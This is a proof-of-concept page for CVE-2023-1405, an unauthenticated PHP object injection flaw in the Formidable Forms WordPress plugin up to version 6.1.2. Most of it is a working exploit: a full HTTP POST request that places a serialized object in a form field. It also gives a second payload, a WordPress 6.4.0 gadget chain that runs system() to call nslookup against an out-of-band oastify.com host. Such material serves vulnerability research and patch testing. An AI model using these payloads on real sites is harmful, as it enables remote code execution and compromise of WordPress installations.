CVE-2023-1405 PoC — Formidable Forms < 6.2 - Unauthenticated PHP Object Injection

Source

Associated Vulnerability

Description

Formidable Forms <= 6.1.2 - Unauthenticated PHP Object Injection

Readme

# CVE-2023-1405
Formidable Forms <= 6.1.2 - Unauthenticated PHP Object Injection

# Description: 
The Formidable Forms plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 6.1.2 via deserialization of untrusted input from form submissions. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.

```
Type: plugin
CVSS Score: 9.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2023-1405
```

POC
---

```
POST /wp-admin/admin-ajax.php?action=frm_forms_preview&form=contact-form HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin-ajax.php?action=frm_forms_preview&form=contact-form
Content-Type: multipart/form-data; boundary=---------------------------343242131629515258773021267392
Content-Length: 1871
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Priority: u=0, i

-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="frm_action"

create
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="form_id"

1
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="frm_hide_fields_1"


-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="form_key"

contact-form
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_meta[0]"


-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="frm_submit_entry_1"

5dc418e798
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/admin-ajax.php?action=frm_forms_preview&form=contact-form
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_meta[1]"

test
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_meta[2]"

teasads
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_meta[3]"

bob@bob.com
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_meta[4]"

teasdsda
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_meta[5]"

O:20:"PHP_Object_Injection":0:{}
-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="item_key"


-----------------------------343242131629515258773021267392
Content-Disposition: form-data; name="frm_verify"


-----------------------------343242131629515258773021267392--
```


You can use this payload also `O:13:"WP_HTML_Token":2:{s:13:"bookmark_name";s:53:"nslookup jj603shxad7lmfb20joe5vrjva11pudj.oastify.com";s:10:"on_destroy";s:6:"system";}` for Wordpres 6.4.0

File Snapshot

 [4.0K]  /data/pocs/b72f9fe5ceede1a1e2aa0f13aeca9170831ebb21
└── [3.3K]  README.md

1 directory, 1 file

Remarks